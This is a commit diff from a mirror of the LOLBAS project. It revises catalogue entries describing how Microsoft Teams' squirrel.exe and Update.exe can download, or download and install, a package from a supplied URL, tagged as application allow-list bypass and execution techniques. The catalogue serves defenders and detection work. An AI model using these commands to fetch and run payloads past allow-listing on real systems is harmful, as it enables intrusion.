mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2024-12-26 14:59:03 +01:00
Adjusted Update and Squirrel
This commit is contained in:
parent
3be3e5f3f8
commit
e05ae6c051
@ -6,24 +6,24 @@ Created: '2019-06-26'
|
|||||||
Commands:
|
Commands:
|
||||||
- Command: squirrel.exe --download [url to package]
|
- Command: squirrel.exe --download [url to package]
|
||||||
Description: The above binary will go to url and look for RELEASES file and download the nuget package.
|
Description: The above binary will go to url and look for RELEASES file and download the nuget package.
|
||||||
Usecase: Download and execute binary
|
Usecase: Download binary
|
||||||
Category: Execute
|
Category: Download
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
MitreLink: https://attack.mitre.org/techniques/T1218/
|
MitreLink: https://attack.mitre.org/techniques/T1218/
|
||||||
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
||||||
- Command: squirrel.exe --download [url to package]
|
- Command: squirrel.exe --update [url to package]
|
||||||
Description: The above binary will go to url and look for RELEASES file and download the nuget package.
|
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
|
||||||
Usecase: Download and execute binary
|
Usecase: Download and execute binary
|
||||||
Category: AWL Bypass
|
Category: AWL Bypass
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
MitreLink: https://attack.mitre.org/techniques/T1218/
|
MitreLink: https://attack.mitre.org/techniques/T1218/
|
||||||
OperatingSystem: Windows 10
|
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
||||||
- Command: squirrel.exe --download [url to package]
|
- Command: squirrel.exe --update [url to package]
|
||||||
Description: The above binary will go to url and look for RELEASES file and download the nuget package.
|
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
|
||||||
Usecase: Download and execute binary
|
Usecase: Download and execute binary
|
||||||
Category: Download
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
MitreLink: https://attack.mitre.org/techniques/T1218/
|
MitreLink: https://attack.mitre.org/techniques/T1218/
|
||||||
|
@ -6,24 +6,24 @@ Created: '2019-06-26'
|
|||||||
Commands:
|
Commands:
|
||||||
- Command: Update.exe --download [url to package]
|
- Command: Update.exe --download [url to package]
|
||||||
Description: The above binary will go to url and look for RELEASES file and download the nuget package.
|
Description: The above binary will go to url and look for RELEASES file and download the nuget package.
|
||||||
Usecase: Download and execute binary
|
Usecase: Download binary
|
||||||
Category: Execute
|
Category: Download
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
MitreLink: https://attack.mitre.org/techniques/T1218/
|
MitreLink: https://attack.mitre.org/techniques/T1218/
|
||||||
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
||||||
- Command: Update.exe --download [url to package]
|
- Command: Update.exe --update [url to package]
|
||||||
Description: The above binary will go to url and look for RELEASES file and download the nuget package.
|
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
|
||||||
Usecase: Download and execute binary
|
Usecase: Download and execute binary
|
||||||
Category: AWL Bypass
|
Category: AWL Bypass
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
MitreLink: https://attack.mitre.org/techniques/T1218/
|
MitreLink: https://attack.mitre.org/techniques/T1218/
|
||||||
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
||||||
- Command: Update.exe --download [url to package]
|
- Command: Update.exe --update [url to package]
|
||||||
Description: The above binary will go to url and look for RELEASES file and download the nuget package.
|
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
|
||||||
Usecase: Download and execute binary
|
Usecase: Download and execute binary
|
||||||
Category: Download
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
MitreLink: https://attack.mitre.org/techniques/T1218/
|
MitreLink: https://attack.mitre.org/techniques/T1218/
|
||||||
|
Loading…
Reference in New Issue
Block a user